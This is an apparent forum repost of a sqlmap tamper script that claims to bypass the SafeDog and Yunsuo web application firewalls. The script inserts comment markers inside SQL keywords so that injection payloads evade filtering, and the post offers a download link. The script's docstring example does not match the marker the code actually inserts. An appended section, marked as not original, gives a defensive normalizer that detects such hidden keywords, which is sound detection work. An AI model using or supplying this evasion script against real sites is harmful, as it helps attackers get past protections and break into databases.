A sqlmap injection script for bypassing SafeDog and Yunsuo
Date: 2016-11-25 10:28 Source: repost Author: Sinyer
#!/usr/bin/env python

"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

import re

from lib.core.common import randomRange
from lib.core.data import kb
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def tamper(payload, **kwargs):
    """
    Add random comments to SQL keywords

    >>> import random
    >>> random.seed(0)
    >>> tamper('INSERT')
    'I/**/N/**/SERT'
    """

    retVal = payload

    if payload:
        # Visit every alphabetic word in the payload
        for match in re.finditer(r"\b[A-Za-z_]+\b", payload):
            word = match.group()

            if len(word) < 2:
                continue

            # Only words that sqlmap lists as SQL keywords are rewritten
            if word.upper() in kb.keywords:
                _ = word[0]

                for i in xrange(1, len(word) - 1):
                    _ += "%s%s" % ("/*/#\*/*" if randomRange(0, 1) else "", word[i])

                _ += word[-1]

                if "/**/" not in _:
                    index = randomRange(1, len(word) - 1)
                    _ = word[:index] + "/*/#\*/*" + word[index:]

                retVal = retVal.replace(word, _)

    return retVal

Download: link: http://pan.baidu.com/s/1ge514X1 password: i9jj

(Editor: 蜗蜗侠)
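A detection-side counterpart to the script above, added here as an example and not part of the original post or of sqlmap: it removes comment markers wedged inside words and reports SQL keywords that only appear after that normalization. The keyword list, function names and sample values are constructed assumptions.

```python
import re

# Comment markers seen in the tamper output: the string used by the script
# above and the empty comment from its docstring example.
MARKERS = ("/*/#\\*/*", "/**/")

# Any other block comment with a letter directly on both sides of it.
INTRA_WORD_COMMENT = re.compile(r"(?<=[A-Za-z])/\*.*?\*/(?=[A-Za-z])", re.S)

# Constructed keyword list for the demo (assumption); a real rule set would
# use the keyword list of the database engine being protected.
KEYWORDS = {"SELECT", "UNION", "INSERT", "UPDATE", "DELETE", "FROM", "WHERE"}

WORD = re.compile(r"[A-Za-z_]+")


def normalize(value):
    """Drop the known markers, then any block comment wedged between letters."""
    for marker in MARKERS:
        value = value.replace(marker, "")
    return INTRA_WORD_COMMENT.sub("", value)


def hidden_keywords(value):
    """Return SQL keywords that only become visible after normalization."""
    before = {w.upper() for w in WORD.findall(value)}
    after = {w.upper() for w in WORD.findall(normalize(value))}
    return sorted((after - before) & KEYWORDS)


if __name__ == "__main__":
    # Constructed request parameter values, not captured traffic.
    samples = [
        r"1 UN/*/#\*/*ION SEL/*/#\*/*ECT 1,2",  # marker from the script above
        "I/**/N/**/SERT",                        # form shown in the docstring
        "SELECT name FROM t",                    # plain keyword, nothing hidden
        "width /* px */ 10",                     # ordinary comment between words
    ]
    for sample in samples:
        found = hidden_keywords(sample)
        print("%-40s -> %s" % (sample, found if found else "clean"))
```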